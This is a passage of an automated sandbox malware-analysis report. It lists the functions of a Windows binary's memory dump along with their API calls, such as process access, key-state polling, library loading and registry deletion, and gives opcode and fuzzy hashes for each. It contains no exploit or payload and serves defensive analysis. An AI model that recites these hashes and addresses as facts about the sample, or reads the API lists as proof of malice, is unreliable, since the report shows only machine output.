                                                                                                                                                                  • Instruction ID: 64290a0ccc412ba7f8c66cfd28127542a8df51d5ec6fbcd434d409975d8324dc
                                                                                                                                                                  • Opcode Fuzzy Hash: 28b70ca742c5fc23291f3d759ad942ff0f63f2f137343593c17dd68dba9191ea
                                                                                                                                                                  • Instruction Fuzzy Hash: ED21C2F6A50208BFE711EF649C95EBBB6FCEB48B44F10411AF50592140DAA0AD154B71
                                                                                                                                                                  Function 001E38E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0025454E
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • _memset.LIBCMT ref: 001E3965
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 001E39B5
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E39C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                                  • String ID: Line:
                                                                                                                                                                  • API String ID: 3942752672-1585850449
                                                                                                                                                                  • Opcode ID: fc292c4c82a0144c7d26155437e2405cc24c7b98c8a5b137f9fb33ce1b3a6a02
                                                                                                                                                                  • Instruction ID: 254ad36087d779d342d158e1ab3fe30c2bc94cad29c9b6f2febbe55ecc1588a2
                                                                                                                                                                  • Opcode Fuzzy Hash: fc292c4c82a0144c7d26155437e2405cc24c7b98c8a5b137f9fb33ce1b3a6a02
                                                                                                                                                                  • Instruction Fuzzy Hash: 15310731018780ABD321EB61EC49FDF77E8AF55314F00451AF599830A2EF709A58CB92
                                                                                                                                                                  Function 00248EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001FC657
                                                                                                                                                                    • Part of subcall function 001FC619: GetStockObject.GDI32(00000011), ref: 001FC66B
                                                                                                                                                                    • Part of subcall function 001FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 001FC675
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00248F69
                                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00248F70
                                                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00248F85
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00248F8D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                                                  • Opcode ID: 8b69e8f4f044bc765a5faa9e32539f0721a87a809dbcd490e224dc9fad052305
                                                                                                                                                                  • Instruction ID: 6de26e236c19f0a9451d77aecdcf786300da8c192a62f33f12183478c40cd4e5
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b69e8f4f044bc765a5faa9e32539f0721a87a809dbcd490e224dc9fad052305
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A21CF7123020AAFEF144E64EC44EBF37AEEB59324F914614FA1497590DB71DC649760
                                                                                                                                                                  Function 0022E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0022E392
                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0022E3E6
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022E3FF
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0027DBF0), ref: 0022E43D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                  • String ID: %lu
                                                                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                                                                  • Opcode ID: 392e0030263bcf08f2dcae6efe49e0f26812a5045884ed0549332b5c93abc2f2
                                                                                                                                                                  • Instruction ID: e23305b3e16fb7444a996fff4dc8d6ac161321a9c9102172f6c8d407c5cb392c
                                                                                                                                                                  • Opcode Fuzzy Hash: 392e0030263bcf08f2dcae6efe49e0f26812a5045884ed0549332b5c93abc2f2
                                                                                                                                                                  • Instruction Fuzzy Hash: C5215335A40208AFCB10EFA5DC89DAEB7B8EF99714F1080A9F509EB251D771DE15CB50
                                                                                                                                                                  Function 0021D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                    • Part of subcall function 0021D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0021D640
                                                                                                                                                                    • Part of subcall function 0021D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0021D653
                                                                                                                                                                    • Part of subcall function 0021D623: GetCurrentThreadId.KERNEL32 ref: 0021D65A
                                                                                                                                                                    • Part of subcall function 0021D623: AttachThreadInput.USER32(00000000), ref: 0021D661
                                                                                                                                                                  • GetFocus.USER32 ref: 0021D7FB
                                                                                                                                                                    • Part of subcall function 0021D66C: GetParent.USER32(?), ref: 0021D67A
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0021D844
                                                                                                                                                                  • EnumChildWindows.USER32(?,0021D8BA), ref: 0021D86C
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0021D886
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                                  • String ID: %s%d
                                                                                                                                                                  • API String ID: 1941087503-1110647743
                                                                                                                                                                  • Opcode ID: dbe48dd02c6e21288be9803c77623e36b4ecbf4a07c6ca3c8a5012ef7a96aea4
                                                                                                                                                                  • Instruction ID: e2aea3c9abafeb9925b2e26d459962281852733e497b5ec6ded41db324a33ecd
                                                                                                                                                                  • Opcode Fuzzy Hash: dbe48dd02c6e21288be9803c77623e36b4ecbf4a07c6ca3c8a5012ef7a96aea4
                                                                                                                                                                  • Instruction Fuzzy Hash: D311E471610209ABDF11BF50EC89FEE37ACAF64704F0080B5FE09AA086DBB459958B70
                                                                                                                                                                  Function 00241836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002418E4
                                                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00241917
                                                                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00241A3A
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00241AB0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2364364464-0
                                                                                                                                                                  • Opcode ID: bd17f114396db880eaf6e7bd0234997bcda3396cd57cfc064115fe717b3dfd20
                                                                                                                                                                  • Instruction ID: 12cf7ef75b0a10dcbcafd55ae04f739bcd39e0874f1207f3eb6b8a8dd72fee9c
                                                                                                                                                                  • Opcode Fuzzy Hash: bd17f114396db880eaf6e7bd0234997bcda3396cd57cfc064115fe717b3dfd20
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E81B071A50219ABDF14DF64C886BADBBF5AF48720F048059F909AF382D7B5E950CB90
                                                                                                                                                                  Function 00240579 Relevance: 7.6, APIs: 5, Instructions: 149libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002405DF
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,?,?,?,00000004,00000004,?,?), ref: 0024066E
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,00000000,00000004,00000004,?,?), ref: 0024068C
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,?,?,?,00000041,00000004), ref: 002406D2
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 002406EC
                                                                                                                                                                    • Part of subcall function 001FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0022AEA5,?,?,00000000,00000008), ref: 001FF282
                                                                                                                                                                    • Part of subcall function 001FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0022AEA5,?,?,00000000,00000008), ref: 001FF2A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2773980681-0
                                                                                                                                                                  • Opcode ID: 953c9336da1fbda47bd26430fa1bf6684527b4e81706af78efe200fee56daa50
                                                                                                                                                                  • Instruction ID: 683ade7d86d31021e26df1f6ca050f0857c46d435279264ce419dac6a0291290
                                                                                                                                                                  • Opcode Fuzzy Hash: 953c9336da1fbda47bd26430fa1bf6684527b4e81706af78efe200fee56daa50
                                                                                                                                                                  • Instruction Fuzzy Hash: D751AB75A006069FCB04EFA8C894DADF7B9FF58310B1580A9EA16AB351DB70ED51CF80
                                                                                                                                                                  Function 0024CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f6963f6d006ac7d275df695d299974d19f678e43375d619b3fc6717e9032b37e
                                                                                                                                                                  • Instruction ID: ae0c90961cab18c91d6ad0e1b4e9e800670b736b10643d7a9617c6ae39e5cad9
                                                                                                                                                                  • Opcode Fuzzy Hash: f6963f6d006ac7d275df695d299974d19f678e43375d619b3fc6717e9032b37e
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D412639E21105AFD768DF7CDC89FA9BB69EB09320F244156F819A72D1C7B09D20DA50
                                                                                                                                                                  Function 00231726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002317D4
                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002317FD
                                                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0023183C
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00231861
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00231869
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                                                  • Opcode ID: 997f495c1979195d0a6396761b8590fd918ffbca36bf4496f8a2732ec9ed5259
                                                                                                                                                                  • Instruction ID: 1ffabdc8d3ee86a6db63aef6eb07e3a075aef108afb2f3afec6f6f53928eed9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 997f495c1979195d0a6396761b8590fd918ffbca36bf4496f8a2732ec9ed5259
                                                                                                                                                                  • Instruction Fuzzy Hash: 15411A75A00609DFDB01EF65C995AADBBF5FF08310B148099E809AB3A2DB31ED11DF51
                                                                                                                                                                  Function 001FB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(000000FF), ref: 001FB749
                                                                                                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 001FB766
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 001FB78B
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 001FB799
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                                                  • Opcode ID: 05423c2f304642b991c9f5b1a6d880d5bea64fcba746164d373126eff69b66b1
                                                                                                                                                                  • Instruction ID: f8730733da20140ee38057a60e63ae61eb01b13587f26ca12877f68191eb0640
                                                                                                                                                                  • Opcode Fuzzy Hash: 05423c2f304642b991c9f5b1a6d880d5bea64fcba746164d373126eff69b66b1
                                                                                                                                                                  • Instruction Fuzzy Hash: 62418375918119FFDF19AF64C884AF9BBB4BB45331F104319F925922D0C730AA64DF94
                                                                                                                                                                  Function 00243C63 Relevance: 7.6, APIs: 5, Instructions: 100registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00243C92
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00243D71
                                                                                                                                                                    • Part of subcall function 00243C63: FreeLibrary.KERNEL32(?), ref: 00243D2B
                                                                                                                                                                    • Part of subcall function 00243C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00243D4E
                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00243D16
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumFreeLibrary$Delete
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1943264518-0
                                                                                                                                                                  • Opcode ID: 22f5d240ec7aab200ab1ffd612fbe3895ffaffe5ab368f1e7989f403047d0f90
                                                                                                                                                                  • Instruction ID: 8ec8f48ab67f77ec51c13cf781b383b9556b40d79a837b15db319011945da506
                                                                                                                                                                  • Opcode Fuzzy Hash: 22f5d240ec7aab200ab1ffd612fbe3895ffaffe5ab368f1e7989f403047d0f90
                                                                                                                                                                  • Instruction Fuzzy Hash: F1310871E2120AFFDB19DF94DC89AFEB7BCEF08300F10416AE512A2150D6B09F599B60
                                                                                                                                                                  Function 0021C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0021C156
                                                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 0021C200
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0021C208
                                                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 0021C216
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0021C21E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                                                  • Opcode ID: 159b6e5c8d4f0a8fb0825ad62e090893dadc63dc5f42c91440ff0dba12501620
                                                                                                                                                                  • Instruction ID: 673ea3951a53091db9415887db79d4cd40e9e7874c10253aa6936401ac0fab1d
                                                                                                                                                                  • Opcode Fuzzy Hash: 159b6e5c8d4f0a8fb0825ad62e090893dadc63dc5f42c91440ff0dba12501620
                                                                                                                                                                  • Instruction Fuzzy Hash: A431D175A9021EEBDF04CFA8DD4CADE3BB5EB14315F204228F828A71D1C7B09954CB90
                                                                                                                                                                  Function 0021E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
